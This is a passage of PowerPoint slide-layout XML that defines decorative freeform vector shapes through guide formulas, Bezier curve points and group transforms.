                  <a:gd name="T43" fmla="*/ 243 h 243"/>
                  <a:gd name="T44" fmla="*/ 172 w 313"/>
                  <a:gd name="T45" fmla="*/ 243 h 243"/>
                  <a:gd name="T46" fmla="*/ 198 w 313"/>
                  <a:gd name="T47" fmla="*/ 216 h 243"/>
                  <a:gd name="T48" fmla="*/ 159 w 313"/>
                  <a:gd name="T49" fmla="*/ 170 h 243"/>
                  <a:gd name="T50" fmla="*/ 259 w 313"/>
                  <a:gd name="T51" fmla="*/ 36 h 243"/>
                  <a:gd name="T52" fmla="*/ 236 w 313"/>
                  <a:gd name="T53" fmla="*/ 120 h 243"/>
                  <a:gd name="T54" fmla="*/ 214 w 313"/>
                  <a:gd name="T55" fmla="*/ 174 h 243"/>
                  <a:gd name="T56" fmla="*/ 241 w 313"/>
                  <a:gd name="T57" fmla="*/ 164 h 243"/>
                  <a:gd name="T58" fmla="*/ 263 w 313"/>
                  <a:gd name="T59" fmla="*/ 159 h 243"/>
                  <a:gd name="T60" fmla="*/ 297 w 313"/>
                  <a:gd name="T61" fmla="*/ 174 h 243"/>
                  <a:gd name="T62" fmla="*/ 313 w 313"/>
                  <a:gd name="T63" fmla="*/ 129 h 243"/>
                  <a:gd name="T64" fmla="*/ 32 w 313"/>
                  <a:gd name="T65" fmla="*/ 70 h 243"/>
                  <a:gd name="T66" fmla="*/ 35 w 313"/>
                  <a:gd name="T67" fmla="*/ 73 h 243"/>
                  <a:gd name="T68" fmla="*/ 32 w 313"/>
                  <a:gd name="T69" fmla="*/ 75 h 243"/>
                  <a:gd name="T70" fmla="*/ 124 w 313"/>
                  <a:gd name="T71" fmla="*/ 194 h 243"/>
                  <a:gd name="T72" fmla="*/ 124 w 313"/>
                  <a:gd name="T73" fmla="*/ 190 h 243"/>
                  <a:gd name="T74" fmla="*/ 124 w 313"/>
                  <a:gd name="T75" fmla="*/ 194 h 243"/>
                  <a:gd name="T76" fmla="*/ 279 w 313"/>
                  <a:gd name="T77" fmla="*/ 126 h 243"/>
                  <a:gd name="T78" fmla="*/ 284 w 313"/>
                  <a:gd name="T79" fmla="*/ 126 h 243"/>
                  <a:gd name="T80" fmla="*/ 296 w 313"/>
                  <a:gd name="T81" fmla="*/ 129 h 243"/>
                  <a:gd name="T82" fmla="*/ 296 w 313"/>
                  <a:gd name="T83" fmla="*/ 124 h 243"/>
                  <a:gd name="T84" fmla="*/ 296 w 313"/>
                  <a:gd name="T85" fmla="*/ 129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3" h="243">
                    <a:moveTo>
                      <a:pt x="313" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="313" y="114"/>
                      <a:pt x="300" y="109"/>
                      <a:pt x="288" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="269" y="109"/>
                      <a:pt x="264" y="120"/>
                      <a:pt x="264" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="264" y="120"/>
                      <a:pt x="264" y="120"/>
                      <a:pt x="264" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="264" y="38"/>
                      <a:pt x="264" y="38"/>
                      <a:pt x="264" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="272" y="40"/>
                      <a:pt x="279" y="43"/>
                      <a:pt x="287" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="291" y="48"/>
                      <a:pt x="295" y="46"/>
                      <a:pt x="296" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="298" y="39"/>
                      <a:pt x="296" y="35"/>
                      <a:pt x="292" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="0"/>
                      <a:pt x="140" y="2"/>
                      <a:pt x="92" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="18"/>
                      <a:pt x="7" y="33"/>
                      <a:pt x="5" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="36"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="2" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="47"/>
                      <a:pt x="8" y="48"/>
                      <a:pt x="11" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="46"/>
                      <a:pt x="19" y="43"/>
                      <a:pt x="32" y="38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27" y="65"/>
                      <a:pt x="26" y="69"/>
                      <a:pt x="22" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="72"/>
                      <a:pt x="12" y="73"/>
                      <a:pt x="12" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="85"/>
                      <a:pt x="20" y="85"/>
                      <a:pt x="26" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="85"/>
                      <a:pt x="25" y="124"/>
                      <a:pt x="20" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="195"/>
                      <a:pt x="15" y="195"/>
                      <a:pt x="15" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="195"/>
                      <a:pt x="39" y="195"/>
                      <a:pt x="39" y="19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8" y="165"/>
                      <a:pt x="46" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="165"/>
                      <a:pt x="52" y="173"/>
                      <a:pt x="52" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="195"/>
                      <a:pt x="52" y="195"/>
                      <a:pt x="52" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="195"/>
                      <a:pt x="79" y="195"/>
                      <a:pt x="79" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="195"/>
                      <a:pt x="81" y="167"/>
                      <a:pt x="71" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="133"/>
                      <a:pt x="44" y="125"/>
                      <a:pt x="43" y="104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3" y="78"/>
                      <a:pt x="52" y="80"/>
                      <a:pt x="55" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="70"/>
                      <a:pt x="49" y="63"/>
                      <a:pt x="42" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="67"/>
                      <a:pt x="40" y="65"/>
                      <a:pt x="38" y="64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52" y="32"/>
                      <a:pt x="71" y="27"/>
                      <a:pt x="95" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="21"/>
                      <a:pt x="132" y="19"/>
                      <a:pt x="154" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="170"/>
                      <a:pt x="154" y="170"/>
                      <a:pt x="154" y="170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25" y="170"/>
                      <a:pt x="114" y="186"/>
                      <a:pt x="114" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="212"/>
                      <a:pt x="112" y="238"/>
                      <a:pt x="112" y="238"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="235"/>
                      <a:pt x="119" y="235"/>
                      <a:pt x="119" y="235"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="235"/>
                      <a:pt x="114" y="226"/>
                      <a:pt x="116" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="206"/>
                      <a:pt x="123" y="207"/>
                      <a:pt x="123" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="206"/>
                      <a:pt x="128" y="216"/>
                      <a:pt x="128" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="243"/>
                      <a:pt x="128" y="243"/>
                      <a:pt x="128" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="243"/>
                      <a:pt x="155" y="243"/>
                      <a:pt x="155" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="243"/>
                      <a:pt x="154" y="231"/>
                      <a:pt x="163" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="231"/>
                      <a:pt x="172" y="229"/>
                      <a:pt x="172" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="242"/>
                      <a:pt x="198" y="242"/>
                      <a:pt x="198" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="242"/>
                      <a:pt x="198" y="224"/>
                      <a:pt x="198" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="206"/>
                      <a:pt x="196" y="198"/>
                      <a:pt x="196" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="177"/>
                      <a:pt x="170" y="172"/>
                      <a:pt x="159" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="19"/>
                      <a:pt x="159" y="19"/>
                      <a:pt x="159" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="20"/>
                      <a:pt x="223" y="24"/>
                      <a:pt x="259" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="120"/>
                      <a:pt x="259" y="120"/>
                      <a:pt x="259" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="120"/>
                      <a:pt x="236" y="120"/>
                      <a:pt x="236" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="120"/>
                      <a:pt x="214" y="120"/>
                      <a:pt x="214" y="145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44" y="174"/>
                      <a:pt x="244" y="174"/>
                      <a:pt x="244" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244" y="174"/>
                      <a:pt x="241" y="169"/>
                      <a:pt x="241" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="241" y="161"/>
                      <a:pt x="242" y="159"/>
                      <a:pt x="246" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="159"/>
                      <a:pt x="263" y="159"/>
                      <a:pt x="263" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="174"/>
                      <a:pt x="263" y="174"/>
                      <a:pt x="263" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="174"/>
                      <a:pt x="297" y="174"/>
                      <a:pt x="297" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="174"/>
                      <a:pt x="289" y="163"/>
                      <a:pt x="289" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="299" y="151"/>
                      <a:pt x="313" y="147"/>
                      <a:pt x="313" y="129"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="30" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="71"/>
                      <a:pt x="31" y="71"/>
                      <a:pt x="32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4" y="70"/>
                      <a:pt x="35" y="71"/>
                      <a:pt x="35" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="74"/>
                      <a:pt x="34" y="75"/>
                      <a:pt x="32" y="75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31" y="74"/>
                      <a:pt x="30" y="74"/>
                      <a:pt x="30" y="73"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="124" y="194"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="194"/>
                      <a:pt x="122" y="193"/>
                      <a:pt x="122" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="191"/>
                      <a:pt x="123" y="190"/>
                      <a:pt x="124" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="190"/>
                      <a:pt x="127" y="191"/>
                      <a:pt x="127" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="193"/>
                      <a:pt x="126" y="194"/>
                      <a:pt x="124" y="194"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="281" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="129"/>
                      <a:pt x="279" y="128"/>
                      <a:pt x="279" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279" y="125"/>
                      <a:pt x="280" y="124"/>
                      <a:pt x="281" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="283" y="124"/>
                      <a:pt x="284" y="125"/>
                      <a:pt x="284" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="284" y="128"/>
                      <a:pt x="283" y="129"/>
                      <a:pt x="281" y="129"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="296" y="129"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="295" y="129"/>
                      <a:pt x="294" y="128"/>
                      <a:pt x="294" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294" y="125"/>
                      <a:pt x="295" y="124"/>
                      <a:pt x="296" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="124"/>
                      <a:pt x="298" y="125"/>
                      <a:pt x="298" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="298" y="128"/>
                      <a:pt x="297" y="129"/>
                      <a:pt x="296" y="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7BF73C70-5A34-408C-B0D0-AAC6B0FA74AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="670385">
              <a:off x="7868779" y="4732314"/>
              <a:ext cx="282094" cy="805573"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="165" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACF7E42-8057-4CC4-9F3D-ED59ED394F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6" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC54B8E7-5F77-4BBF-8866-CA306B51C6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7" name="任意多边形 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F12A1D86-EA75-465D-9062-7E6EB43AD77F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Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D311266-2DFD-4013-B2B3-DF05487F43D9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18344534">
              <a:off x="7427848" y="4018982"/>
              <a:ext cx="352657" cy="659317"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="163" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{880C4BAD-C7B0-4E9D-95B8-6400A686C80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6FE4D6BC-B3DD-44C1-9C9F-7B6BB9B09F1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50CD4672-8A03-47AC-A003-C7F4AE133349}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="1588421">
              <a:off x="2012300" y="3787880"/>
              <a:ext cx="1240338" cy="634328"/>
              <a:chOff x="10078074" y="1730681"/>
              <a:chExt cx="695325" cy="355600"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="161" name="Oval 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{621A0587-93D9-435A-B221-0BB35AA4D36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078074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2" name="Freeform 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3683375B-93D1-4B8A-8DF7-16B6274872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0" name="Group 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A640096-D262-4E71-B044-A4AB31184118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771236" y="688287"/>
              <a:ext cx="674688" cy="869950"/>
              <a:chOff x="2671" y="1887"/>
              <a:chExt cx="425" cy="548"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="156" name="Freeform 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{647093C2-2774-4B9D-8304-9C32ADB790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96" y="240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Freeform 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F351790D-84A9-4627-A114-541ECA63B0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64" y="240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8" name="Freeform 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68967320-35AB-4547-8205-DA3F7D52797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671" y="1887"/>
                <a:ext cx="425" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 155 w 177"/>
                  <a:gd name="T1" fmla="*/ 195 h 229"/>
                  <a:gd name="T2" fmla="*/ 174 w 177"/>
                  <a:gd name="T3" fmla="*/ 169 h 229"/>
                  <a:gd name="T4" fmla="*/ 173 w 177"/>
                  <a:gd name="T5" fmla="*/ 147 h 229"/>
                  <a:gd name="T6" fmla="*/ 160 w 177"/>
                  <a:gd name="T7" fmla="*/ 121 h 229"/>
                  <a:gd name="T8" fmla="*/ 147 w 177"/>
                  <a:gd name="T9" fmla="*/ 91 h 229"/>
                  <a:gd name="T10" fmla="*/ 22 w 177"/>
                  <a:gd name="T11" fmla="*/ 65 h 229"/>
                  <a:gd name="T12" fmla="*/ 12 w 177"/>
                  <a:gd name="T13" fmla="*/ 110 h 229"/>
                  <a:gd name="T14" fmla="*/ 16 w 177"/>
                  <a:gd name="T15" fmla="*/ 122 h 229"/>
                  <a:gd name="T16" fmla="*/ 0 w 177"/>
                  <a:gd name="T17" fmla="*/ 169 h 229"/>
                  <a:gd name="T18" fmla="*/ 15 w 177"/>
                  <a:gd name="T19" fmla="*/ 193 h 229"/>
                  <a:gd name="T20" fmla="*/ 20 w 177"/>
                  <a:gd name="T21" fmla="*/ 195 h 229"/>
                  <a:gd name="T22" fmla="*/ 52 w 177"/>
                  <a:gd name="T23" fmla="*/ 215 h 229"/>
                  <a:gd name="T24" fmla="*/ 55 w 177"/>
                  <a:gd name="T25" fmla="*/ 219 h 229"/>
                  <a:gd name="T26" fmla="*/ 87 w 177"/>
                  <a:gd name="T27" fmla="*/ 220 h 229"/>
                  <a:gd name="T28" fmla="*/ 120 w 177"/>
                  <a:gd name="T29" fmla="*/ 219 h 229"/>
                  <a:gd name="T30" fmla="*/ 123 w 177"/>
                  <a:gd name="T31" fmla="*/ 215 h 229"/>
                  <a:gd name="T32" fmla="*/ 148 w 177"/>
                  <a:gd name="T33" fmla="*/ 215 h 229"/>
                  <a:gd name="T34" fmla="*/ 168 w 177"/>
                  <a:gd name="T35" fmla="*/ 174 h 229"/>
                  <a:gd name="T36" fmla="*/ 158 w 177"/>
                  <a:gd name="T37" fmla="*/ 161 h 229"/>
                  <a:gd name="T38" fmla="*/ 167 w 177"/>
                  <a:gd name="T39" fmla="*/ 141 h 229"/>
                  <a:gd name="T40" fmla="*/ 151 w 177"/>
                  <a:gd name="T41" fmla="*/ 128 h 229"/>
                  <a:gd name="T42" fmla="*/ 155 w 177"/>
                  <a:gd name="T43" fmla="*/ 107 h 229"/>
                  <a:gd name="T44" fmla="*/ 140 w 177"/>
                  <a:gd name="T45" fmla="*/ 103 h 229"/>
                  <a:gd name="T46" fmla="*/ 87 w 177"/>
                  <a:gd name="T47" fmla="*/ 6 h 229"/>
                  <a:gd name="T48" fmla="*/ 29 w 177"/>
                  <a:gd name="T49" fmla="*/ 65 h 229"/>
                  <a:gd name="T50" fmla="*/ 31 w 177"/>
                  <a:gd name="T51" fmla="*/ 98 h 229"/>
                  <a:gd name="T52" fmla="*/ 21 w 177"/>
                  <a:gd name="T53" fmla="*/ 117 h 229"/>
                  <a:gd name="T54" fmla="*/ 9 w 177"/>
                  <a:gd name="T55" fmla="*/ 138 h 229"/>
                  <a:gd name="T56" fmla="*/ 18 w 177"/>
                  <a:gd name="T57" fmla="*/ 150 h 229"/>
                  <a:gd name="T58" fmla="*/ 17 w 177"/>
                  <a:gd name="T59" fmla="*/ 186 h 229"/>
                  <a:gd name="T60" fmla="*/ 7 w 177"/>
                  <a:gd name="T61" fmla="*/ 171 h 229"/>
                  <a:gd name="T62" fmla="*/ 17 w 177"/>
                  <a:gd name="T63" fmla="*/ 186 h 229"/>
                  <a:gd name="T64" fmla="*/ 27 w 177"/>
                  <a:gd name="T65" fmla="*/ 197 h 229"/>
                  <a:gd name="T66" fmla="*/ 36 w 177"/>
                  <a:gd name="T67" fmla="*/ 212 h 229"/>
                  <a:gd name="T68" fmla="*/ 61 w 177"/>
                  <a:gd name="T69" fmla="*/ 215 h 229"/>
                  <a:gd name="T70" fmla="*/ 84 w 177"/>
                  <a:gd name="T71" fmla="*/ 212 h 229"/>
                  <a:gd name="T72" fmla="*/ 106 w 177"/>
                  <a:gd name="T73" fmla="*/ 221 h 229"/>
                  <a:gd name="T74" fmla="*/ 91 w 177"/>
                  <a:gd name="T75" fmla="*/ 211 h 229"/>
                  <a:gd name="T76" fmla="*/ 114 w 177"/>
                  <a:gd name="T77" fmla="*/ 215 h 229"/>
                  <a:gd name="T78" fmla="*/ 25 w 177"/>
                  <a:gd name="T79" fmla="*/ 152 h 229"/>
                  <a:gd name="T80" fmla="*/ 40 w 177"/>
                  <a:gd name="T81" fmla="*/ 109 h 229"/>
                  <a:gd name="T82" fmla="*/ 150 w 177"/>
                  <a:gd name="T83" fmla="*/ 151 h 229"/>
                  <a:gd name="T84" fmla="*/ 144 w 177"/>
                  <a:gd name="T85" fmla="*/ 185 h 229"/>
                  <a:gd name="T86" fmla="*/ 139 w 177"/>
                  <a:gd name="T87" fmla="*/ 212 h 229"/>
                  <a:gd name="T88" fmla="*/ 146 w 177"/>
                  <a:gd name="T89" fmla="*/ 192 h 229"/>
                  <a:gd name="T90" fmla="*/ 147 w 177"/>
                  <a:gd name="T91" fmla="*/ 207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7" h="229">
                    <a:moveTo>
                      <a:pt x="152" y="210"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="206"/>
                      <a:pt x="156" y="200"/>
                      <a:pt x="155" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="195"/>
                      <a:pt x="155" y="195"/>
                      <a:pt x="155" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="195"/>
                      <a:pt x="154" y="194"/>
                      <a:pt x="154" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="194"/>
                      <a:pt x="158" y="193"/>
                      <a:pt x="160" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="190"/>
                      <a:pt x="177" y="180"/>
                      <a:pt x="174" y="169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3" y="164"/>
                      <a:pt x="170" y="159"/>
                      <a:pt x="165" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="154"/>
                      <a:pt x="171" y="151"/>
                      <a:pt x="173" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="143"/>
                      <a:pt x="174" y="140"/>
                      <a:pt x="173" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171" y="129"/>
                      <a:pt x="166" y="124"/>
                      <a:pt x="159" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="121"/>
                      <a:pt x="159" y="121"/>
                      <a:pt x="160" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="117"/>
                      <a:pt x="162" y="114"/>
                      <a:pt x="162" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162" y="109"/>
                      <a:pt x="162" y="107"/>
                      <a:pt x="162" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="98"/>
                      <a:pt x="154" y="93"/>
                      <a:pt x="147" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="83"/>
                      <a:pt x="153" y="74"/>
                      <a:pt x="153" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="29"/>
                      <a:pt x="123" y="0"/>
                      <a:pt x="87" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="22" y="29"/>
                      <a:pt x="22" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="74"/>
                      <a:pt x="24" y="83"/>
                      <a:pt x="28" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="93"/>
                      <a:pt x="15" y="98"/>
                      <a:pt x="13" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="107"/>
                      <a:pt x="12" y="109"/>
                      <a:pt x="12" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="112"/>
                      <a:pt x="13" y="114"/>
                      <a:pt x="13" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="118"/>
                      <a:pt x="14" y="119"/>
                      <a:pt x="15" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="121"/>
                      <a:pt x="16" y="121"/>
                      <a:pt x="16" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="124"/>
                      <a:pt x="4" y="129"/>
                      <a:pt x="2" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="144"/>
                      <a:pt x="3" y="152"/>
                      <a:pt x="10" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="159"/>
                      <a:pt x="2" y="164"/>
                      <a:pt x="0" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="171"/>
                      <a:pt x="0" y="172"/>
                      <a:pt x="0" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="177"/>
                      <a:pt x="1" y="181"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="189"/>
                      <a:pt x="10" y="192"/>
                      <a:pt x="15" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="193"/>
                      <a:pt x="19" y="194"/>
                      <a:pt x="21" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="194"/>
                      <a:pt x="20" y="195"/>
                      <a:pt x="20" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="195"/>
                      <a:pt x="20" y="195"/>
                      <a:pt x="20" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="203"/>
                      <a:pt x="21" y="210"/>
                      <a:pt x="26" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="217"/>
                      <a:pt x="31" y="218"/>
                      <a:pt x="35" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="221"/>
                      <a:pt x="47" y="219"/>
                      <a:pt x="52" y="215"/>
